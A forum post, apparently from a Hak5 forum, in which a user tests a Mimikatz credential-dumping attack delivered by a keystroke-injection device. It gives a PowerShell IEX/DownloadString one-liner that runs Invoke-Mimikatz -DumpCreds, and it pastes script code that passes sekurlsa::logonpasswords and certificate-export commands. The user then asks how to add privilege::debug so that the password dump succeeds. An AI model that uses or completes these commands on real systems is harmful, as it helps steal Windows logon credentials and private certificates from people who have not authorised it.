Jump to content

Recommended Posts

Posted

Afternoon all -

I've been manually playing with the evil twin duck mimikatz hack or memory leaker, whatever you wanna call it.  Anywho - to test I copied the powershell script I found on another hak5 forum locally and call it like the below

powershell "IEX (New-Object Net.WebClient).DownloadString('c:\users\ballsdeep\desktop\test.ps1'); Invoke-Mimikatz -DumpCreds"

Well, I get the following error and i know why: ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

When I read thru the powershell script, it's missing the privilege line: "privilege::debug"

The below portion of the script is what I think I need to modify because if I modify it to run the priv command only, the script executes and works (returns Privilege '20' OK)

How do I run the priv command and then the dump passwords command?


	if ($PsCmdlet.ParameterSetName -ieq "DumpCreds")
	{
        $ExeArgs = "sekurlsa::logonpasswords Exit"
	}
    elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts")
    {
        $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit"
    }
    else
    {
        $ExeArgs = $Command
    }

 

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...